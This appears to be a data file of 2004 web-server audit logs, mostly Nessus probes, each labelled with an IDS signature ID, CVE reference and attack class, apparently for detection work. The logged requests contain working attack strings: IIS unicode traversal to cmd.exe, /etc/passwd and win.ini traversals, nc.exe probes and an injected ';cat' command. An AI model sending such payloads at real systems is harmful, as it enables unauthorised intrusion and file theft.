981	CVE-2000-0884	web-application-attack	WEB-IIS unicode directory traversal attempt	Request: 68.48.142.117 - - [Tue Mar 9 22:41:41 2004] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 566 Handler: (null) Error: mod_security: Invalid character detected [192] ---------------------------------------- GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0 Connnection: close Host: www mod_security-message: Invalid character detected mod_security-action: 200 HTTP/1.0 200 OK Connection: close Content-Type: text/html; charset=iso-8859-1
982	CVE-2000-0884	web-application-attack	WEB-IIS unicode directory traversal attempt	Request: 68.48.142.117 - - [Tue Mar 9 22:41:34 2004] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 566 Handler: (null) Error: mod_security: Invalid character detected [193] ---------------------------------------- GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 Connnection: close Host: www mod_security-message: Invalid character detected mod_security-action: 200 HTTP/1.0 200 OK Connection: close Content-Type: text/html; charset=iso-8859-1
983	CVE-2000-0884	web-application-attack	WEB-IIS unicode directory traversal attempt	Request: 68.48.142.117 - - [Tue Mar 9 22:41:42 2004] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 566 Handler: (null) Error: mod_security: Invalid character detected [193] ---------------------------------------- GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 Connnection: close Host: www mod_security-message: Invalid character detected mod_security-action: 200 HTTP/1.0 200 OK Connection: close Content-Type: text/html; charset=iso-8859-1
987	CVE-2000-0630	web-application-activity	WEB-IIS .htr access	Request: 217.160.165.173 - - [Fri Mar 12 22:41:44 2004] "GET /NULL.htr HTTP/1.1" 404 288 Handler: (null) Error: mod_security: Warning. Pattern match "\.htr" at THE_REQUEST. ---------------------------------------- GET /NULL.htr HTTP/1.1 Host: www.testproxy.net mod_security-message: Warning. Pattern match "\.htr" at THE_REQUEST. HTTP/1.1 404 Not Found Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
989		web-application-activity	WEB-IIS Unicode2.pl script (File permission canonicalization)	Request: 217.160.165.173 - - [Fri Mar 12 22:45:51 2004] "GET /scripts/sensepost.exe?/c+dir+c:\+/OG HTTP/1.1" 403 305 Handler: (null) Error: client denied by server configuration: /usr/local/apache/htdocs/scripts ---------------------------------------- GET /scripts/sensepost.exe?/c+dir+c:\+/OG HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=82 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
990		web-application-activity	WEB-IIS _vti_inf access	Request: 217.160.165.173 - - [Fri Mar 12 22:43:55 2004] "GET /_vti_inf.html HTTP/1.1" 404 293 Handler: (null) Error: mod_security: Warning. Pattern match "_vti_inf\.html" at THE_REQUEST. ---------------------------------------- GET /_vti_inf.html HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "_vti_inf\.html" at THE_REQUEST. HTTP/1.1 404 Not Found Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
993		web-application-attack	WEB-IIS iisadmin access	Request: 217.160.165.173 - - [Fri Mar 12 22:40:10 2004] "GET /iisadmin/ HTTP/1.1" 200 578 Handler: (null) Error: mod_security: pausing [/iisadmin/] for 50000 ms ---------------------------------------- GET /iisadmin/ HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: 192.168.1.103 Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Access denied with code 200. Pattern match "/iisadmin" at THE_REQUEST. mod_security-action: 200 HTTP/1.1 200 OK Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
995	BID189 CVE-2000-0630	web-application-attack	WEB-IIS ism.dll access	Request: 24.127.175.68 - - [Sat Mar 13 14:41:32 2004] "GET http://brazilian-transsexuals.com/members//scripts/iisadmin/ism.dll?http/dir;dunno;RainM; HTTP/1.0" 200 566 Handler: proxy-server Error: mod_security: pausing [http://brazilian-transsexuals.com/members//scripts/iisadmin/ism.dll?http/dir;dunno;RainM;] for 50000 ms ---------------------------------------- GET http://brazilian-transsexuals.com/members//scripts/iisadmin/ism.dll?http/dir;dunno;RainM; HTTP/1.0 Cache-Control: no-cache Connection: close Host: brazilian-transsexuals.com Pragma: no-cache Proxy-Connection: keep-alive Referer: http://brazilian-transsexuals.com/members//scripts/iisadmin/ism.dll?http/dir;dunno;RainM; User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) mod_security-message: Access denied with code 200. Pattern match "/scripts/iisadmin/ism\.dll\?http/dir" at THE_REQUEST. mod_security-action: 200 HTTP/1.0 200 OK Connection: close Content-Type: text/html; charset=iso-8859-1
997		web-application-attack	WEB-IIS asp-dot attempt	Request: 218.72.187.112 - - [Sat Mar 13 09:13:48 2004] "GET http://pagead2.googlesyndication.com/pagead/ads?client=ca-pub-5160265213986229&random=1079126391580&lmt=1079124085&format=120x600_as&output=html&url=http%3A%2F%2Fwww.spord.com%2Fexpiringdomains.asp.htm&color_bg=FFFFFF&color_text=000000&color_link=0000FF&color_url=008000&color_border=336699 HTTP/1.0" 200 566 Handler: proxy-server Error: mod_security: pausing [http://pagead2.googlesyndication.com/pagead/ads?client=ca-pub-5160265213986229&random=1079126391580&lmt=1079124085&format=120x600_as&output=html&url=http%3A%2F%2Fwww.spord.com%2Fexpiringdomains.asp.htm&color_bg=FFFFFF&color_text=000000&color_link=0000FF&color_url=008000&color_border=336699] for 50000 ms ---------------------------------------- GET http://pagead2.googlesyndication.com/pagead/ads?client=ca-pub-5160265213986229&random=1079126391580&lmt=1079124085&format=120x600_as&output=html&url=http%3A%2F%2Fwww.spord.com%2Fexpiringdomains.asp.htm&color_bg=FFFFFF&color_text=000000&color_link=0000FF&color_url=008000&color_border=336699 HTTP/1.0 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/msword, / Accept-Language: en Connection: Keep-Alive Host: pagead2.googlesyndication.com Referer: http://www.spord.com/expiringdomains.asp.htm User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows 98) mod_security-message: Access denied with code 200. Pattern match "\.asp\." at THE_REQUEST. mod_security-action: 200 HTTP/1.0 200 OK Connection: close Content-Type: text/html; charset=iso-8859-1
1001	BID2126 CAN-1999-1069	attempted-recon	WEB-MISC carbo.dll access	Request: 217.160.165.173 - - [Fri Mar 12 22:42:04 2004] "GET /cgi-bin/carbo.dll?icatcommand=..\..\..\..\..\..\winnt\win.ini&catalogname=catalog HTTP/1.1" 403 301 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/carbo.dll ---------------------------------------- GET /cgi-bin/carbo.dll?icatcommand=..\..\..\..\..\..\winnt\win.ini&catalogname=catalog HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1002		web-application-attack	WEB-IIS cmd.exe access	Request: 68.48.142.117 - - [Tue Mar 9 22:22:57 2004] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 566 Handler: (null) Error: mod_security: pausing [/c/winnt/system32/cmd.exe] for 50000 ms ---------------------------------------- GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0 Connnection: close Host: www mod_security-message: Access denied with code 200. Pattern match "cmd\.exe" at THE_REQUEST. mod_security-action: 200 HTTP/1.0 200 OK Connection: close Content-Type: text/html; charset=iso-8859-1
1013	BID2252	web-application-activity	WEB-IIS fpcount access	Request: 217.160.165.173 - - [Fri Mar 12 22:40:59 2004] "GET /_vti_bin/fpcount.exe HTTP/1.1" 404 300 Handler: (null) Error: mod_security: Warning. Pattern match "/_vti_bin/" at THE_REQUEST. ---------------------------------------- GET /_vti_bin/fpcount.exe HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "/fpcount\.exe" at THE_REQUEST. HTTP/1.1 404 Not Found Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1016	CVE-2000-0778 Nessus 10491	web-application-activity	WEB-IIS global.asa access	Request: 217.160.165.173 - - [Fri Mar 12 22:38:13 2004] "GET /global.asa\ HTTP/1.0" 404 279 Handler: (null) Error: mod_security: Warning. Pattern match "/global\.asa" at THE_REQUEST. ---------------------------------------- GET /global.asa\ HTTP/1.0 Translate: f mod_security-message: Warning. Pattern match "/global\.asa" at THE_REQUEST. HTTP/1.0 404 Not Found Connection: close Content-Type: text/html; charset=iso-8859-1
1023	BID529 CVE-1999-1011	web-application-activity	WEB-IIS msadcs.dll access	Request: 217.160.165.173 - - [Fri Mar 12 22:39:47 2004] "GET /msadc/msadcs.dll HTTP/1.1" 404 296 Handler: (null) Error: mod_security: Warning. Pattern match "/msadcs\.dll" at THE_REQUEST. ---------------------------------------- GET /msadc/msadcs.dll HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: 192.168.1.103 Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "/msadcs\.dll" at THE_REQUEST. HTTP/1.1 404 Not Found Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1024	CVE-1999-0191 BID1818	web-application-activity	WEB-IIS newdsn.exe access	Request: 217.160.165.173 - - [Fri Mar 12 22:37:03 2004] "GET /scripts/tools/newdsn.exe HTTP/1.1" 404 304 Handler: (null) Error: mod_security: Warning. Pattern match "/scripts/tools/newdsn\.exe" at THE_REQUEST. ---------------------------------------- GET /scripts/tools/newdsn.exe HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: 192.168.1.103 Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "/scripts/tools/newdsn\.exe" at THE_REQUEST. HTTP/1.1 404 Not Found Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1038	BID256	web-application-activity	WEB-IIS site server config access	Request: 24.127.175.68 - - [Sat Mar 13 15:16:43 2004] "GET http://thedomina.com/members/index.html/adsamples/config/site.csc;dunno;RainM; HTTP/1.0" 401 19686 Handler: proxy-server Error: mod_security: Warning. Pattern match "/adsamples/config/site\.csc" at THE_REQUEST. ---------------------------------------- GET http://thedomina.com/members/index.html/adsamples/config/site.csc;dunno;RainM; HTTP/1.0 Cache-Control: no-cache Connection: close Host: thedomina.com Pragma: no-cache Proxy-Connection: keep-alive Referer: http://thedomina.com/members/index.html/adsamples/config/site.csc;dunno;RainM; User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) mod_security-message: Warning. Pattern match "/adsamples/config/site\.csc" at THE_REQUEST. HTTP/1.0 401 Authorization Required Warning: Subject to Monitoring WWW-Authenticate: Basic realm="The Domina - Member Entrance" Last-Modified: Sat, 13 Mar 2004 17:13:55 GMT ETag: "3b852a-4ce6-40534153" Accept-Ranges: bytes Content-Length: 19686 Content-Type: text/html X-Cache: MISS from www.testproxy.net Connection: close
1051	BID2156 CVE-2001-0075	web-application-attack	WEB-CGI technote main.cgi file directory traversal attempt	Request: 217.160.165.173 - - [Fri Mar 12 22:37:09 2004] "GET /technote/main.cgi?board=FREE_BOARD&command=down_load&filename=/../../../../../../../../etc/passwd HTTP/1.1" 403 301 Handler: (null) Error: client denied by server configuration: /usr/local/apache/htdocs/technote ---------------------------------------- GET /technote/main.cgi?board=FREE_BOARD&command=down_load&filename=/../../../../../../../../etc/passwd HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1054	BID2527	web-application-attack	WEB-MISC weblogic view source attempt	Request: 217.160.165.173 - - [Fri Mar 12 22:42:03 2004] "GET /cgi-bin/index.js%70 HTTP/1.1" 404 297 Handler: cgi-script Error: script not found or unable to stat: /usr/local/apache/cgi-bin/index.jsp ---------------------------------------- GET /cgi-bin/index.js%70 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 404 Not Found Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1057		web-application-activity	WEB-MISC ftp attempt	Request: 217.160.165.173 - - [Fri Mar 12 22:46:07 2004] "GET /scripts/ftp.exe?/c+-h HTTP/1.1" 404 295 Handler: (null) Error: mod_security: Warning. Pattern match "ftp\.exe" at THE_REQUEST. ---------------------------------------- GET /scripts/ftp.exe?/c+-h HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "ftp\.exe" at THE_REQUEST. HTTP/1.1 404 Not Found Keep-Alive: timeout=15, max=40 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1062		web-application-activity	WEB-MISC nc.exe attempt	Request: 217.160.165.173 - - [Fri Mar 12 22:45:55 2004] "GET /scripts/nc.exe?-h HTTP/1.1" 403 298 Handler: (null) Error: client denied by server configuration: /usr/local/apache/htdocs/scripts ---------------------------------------- GET /scripts/nc.exe?-h HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=48 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1071		web-application-attack	WEB-MISC .htpasswd access	Request: 129.137.161.10 - - [Sat Mar 13 21:31:40 2004] "GET http://www.boygangs.com//.htpasswd.pl HTTP/1.0" 403 308 Handler: proxy-server Error: client denied by server configuration: proxy:http://www.boygangs.com//.htpasswd.pl ---------------------------------------- GET http://www.boygangs.com//.htpasswd.pl HTTP/1.0 Accept: /, text/html HTTP/1.0 403 Forbidden Connection: close Content-Type: text/html; charset=iso-8859-1
1072	BID2173 CVE-2001-0009	web-application-attack	WEB-MISC Lotus Domino directory traversal	Request: 217.160.165.173 - - [Fri Mar 12 22:45:38 2004] "GET %00.nsf/../../../../../lotus/domino/notes.ini HTTP/1.1" 404 279 Handler: (null) ---------------------------------------- GET %00.nsf/../../../../../lotus/domino/notes.ini HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 404 Not Found Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1077		web-application-activity	WEB-MISC queryhit.htm access	Request: 24.127.175.68 - - [Sat Mar 13 14:46:30 2004] "GET http://gunnerworld.com/members/mainmenu/MEMMENU.html/samples/search/queryhit.htm;dunno;RainM; HTTP/1.0" 401 469 Handler: proxy-server Error: mod_security: Warning. Pattern match "/samples/search/queryhit\.htm" at THE_REQUEST. ---------------------------------------- GET http://gunnerworld.com/members/mainmenu/MEMMENU.html/samples/search/queryhit.htm;dunno;RainM; HTTP/1.0 Cache-Control: no-cache Connection: close Host: gunnerworld.com Pragma: no-cache Proxy-Connection: keep-alive Referer: http://gunnerworld.com/members/mainmenu/MEMMENU.html/samples/search/queryhit.htm;dunno;RainM; User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) mod_security-message: Access denied with code 200. Pattern match "/search" at THE_REQUEST. HTTP/1.0 401 Authorization Required Warning: Subject to Monitoring WWW-Authenticate: Basic realm="Members" Content-Type: text/html; charset=iso-8859-1 X-Cache: MISS from www.testproxy.net Connection: close
1078	BID267	web-application-activity	WEB-MISC counter.exe access	Request: 217.160.165.173 - - [Fri Mar 12 22:46:48 2004] "GET /cgi-bin/counter.exe HTTP/1.1" 404 299 Handler: cgi-script Error: script not found or unable to stat: /usr/local/apache/cgi-bin/counter.exe ---------------------------------------- GET /cgi-bin/counter.exe HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 404 Not Found Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1080	CVE-2000-1024 BID1868	web-application-attack	WEB-MISC unify eWave ServletExec upload	Request: 217.160.165.173 - - [Fri Mar 12 22:42:19 2004] "GET /servlet/com.unify.servletexec.UploadServlet HTTP/1.1" 403 327 Handler: (null) Error: client denied by server configuration: /usr/local/apache/htdocs/servlet ---------------------------------------- GET /servlet/com.unify.servletexec.UploadServlet HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: 192.168.1.103 Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1088	CVE-2000-1005 BID1774	web-application-attack	WEB-CGI eXtropia webstore directory traversal	Request: 217.160.165.173 - - [Fri Mar 12 22:38:27 2004] "GET /cgi-bin/Web_Store/web_store.cgi?page=../../../../../../etc/passwd%00.html HTTP/1.1" 403 315 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/Web_Store ---------------------------------------- GET /cgi-bin/Web_Store/web_store.cgi?page=../../../../../../etc/passwd%00.html HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1096	BID1720	web-application-activity	WEB-MISC Talentsoft Web+ internal IP Address access	Request: 217.160.165.173 - - [Fri Mar 12 22:41:50 2004] "GET /cgi-bin/webplus.exe?about HTTP/1.1" 403 303 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/webplus.exe ---------------------------------------- GET /cgi-bin/webplus.exe?about HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=99 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1106	BID1431 CAN-2000-0590	web-application-activity	WEB-CGI Poll-it access	Request: 217.160.165.173 - - [Fri Mar 12 22:40:23 2004] "GET /cgi-bin/pollit/Poll_It_SSI_v2.0.cgi?data_dir=/etc/passwd%00 HTTP/1.1" 200 578 Handler: cgi-script Error: mod_security: Invalid character detected [0] ---------------------------------------- GET /cgi-bin/pollit/Poll_It_SSI_v2.0.cgi?data_dir=/etc/passwd%00 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Invalid character detected mod_security-action: 200 HTTP/1.1 200 OK Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1108	BID1532 CAN-2000-0760	attempted-recon	WEB-MISC Tomcat server snoop access	Request: 217.160.165.173 - - [Fri Mar 12 22:40:14 2004] "GET /examples/jsp/snp/anything.snp HTTP/1.1" 403 313 Handler: (null) Error: client denied by server configuration: /usr/local/apache/htdocs/examples ---------------------------------------- GET /examples/jsp/snp/anything.snp HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1110	CVE-2000-0628 BID1457	attempted-recon	WEB-MISC apache source.asp file access	Request: 217.160.165.173 - - [Fri Mar 12 22:38:31 2004] "GET /site/eg/source.asp HTTP/1.1" 403 302 Handler: (null) Error: client denied by server configuration: /usr/local/apache/htdocs/site ---------------------------------------- GET /site/eg/source.asp HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: 192.168.1.103 Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1111		attempted-recon	WEB-MISC Tomcat server exploit access	Request: 217.160.165.173 - - [Fri Mar 12 22:39:04 2004] "GET /admin/contextAdmin/contextAdmin.html HTTP/1.1" 403 320 Handler: (null) Error: client denied by server configuration: /usr/local/apache/htdocs/admin ---------------------------------------- GET /admin/contextAdmin/contextAdmin.html HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1112	arachNIDS 298	attempted-recon	WEB-MISC http directory traversal	Request: 217.160.165.173 - - [Fri Mar 12 22:30:35 2004] "GET ..\\..\\..\\..\\..\\..\\windows\\win.ini HTTP/1.1" 400 381 Handler: (null) Error: Invalid URI in request GET ..\\..\\..\\..\\..\\..\\windows\\win.ini HTTP/1.1 ---------------------------------------- GET ..\\..\\..\\..\\..\\..\\windows\\win.ini HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 400 Bad Request Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1113	arachNIDS 297	attempted-recon	WEB-MISC http directory traversal	Request: 68.48.142.117 - - [Tue Mar 9 22:45:58 2004] "GET /scripts/..%25%35%63../httpodbc.dll HTTP/1.0" 200 566 Handler: (null) Error: mod_security: pausing [/scripts/..%5c../httpodbc.dll] for 50000 ms ---------------------------------------- GET /scripts/..%25%35%63../httpodbc.dll HTTP/1.0 Connnection: close Host: www mod_security-message: Access denied with code 200. Pattern match "\.\." at THE_REQUEST. mod_security-action: 200 HTTP/1.0 200 OK Connection: close Content-Type: text/html; charset=iso-8859-1
1122		attempted-recon	WEB-MISC /etc/passwd	Request: 217.160.165.173 - - [Fri Mar 12 22:31:14 2004] "GET /PSUser/PSCOErrPage.htm?errPagePath=/etc/passwd HTTP/1.1" 200 578 Handler: (null) Error: mod_security: pausing [/PSUser/PSCOErrPage.htm] for 50000 ms ---------------------------------------- GET /PSUser/PSCOErrPage.htm?errPagePath=/etc/passwd HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Access denied with code 200. Pattern match "/etc/passwd" at THE_REQUEST. mod_security-action: 200 HTTP/1.1 200 OK Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1125	CAN-1999-0610 Nessus 10298	attempted-recon	WEB-MISC webcart access	Request: 217.160.165.173 - - [Fri Mar 12 22:37:45 2004] "GET /webcart/config/ HTTP/1.1" 403 299 Handler: (null) Error: client denied by server configuration: /usr/local/apache/htdocs/webcart ---------------------------------------- GET /webcart/config/ HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1129		attempted-recon	WEB-MISC .htaccess access	Request: 217.160.165.173 - - [Fri Mar 12 22:37:51 2004] "GET /.htaccess HTTP/1.1" 403 293 Handler: (null) Error: client denied by server configuration: /usr/local/apache/htdocs/.htaccess ---------------------------------------- GET /.htaccess HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1140	arachNIDS 228 CVE-1999-0237 BID776 Nessus 10099	attempted-recon	WEB-MISC guestbook.pl access	Request: 217.160.165.173 - - [Fri Mar 12 22:43:02 2004] "GET /cgi-bin/guestbook.pl HTTP/1.1" 403 304 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/guestbook.pl ---------------------------------------- GET /cgi-bin/guestbook.pl HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: 192.168.1.103 Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1147	BID374 CVE-1999-0039	attempted-recon	WEB-MISC cat%20 access	Request: 217.160.165.173 - - [Fri Mar 12 22:37:03 2004] "GET /cgi-local/shop.pl/page=;cat%20shop.pl\| HTTP/1.1" 404 316 Handler: (null) Error: File does not exist: /usr/local/apache/htdocs/cgi-local/shop.pl/page=;cat shop.pl\| ---------------------------------------- GET /cgi-local/shop.pl/page=;cat%20shop.pl\| HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 404 Not Found Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
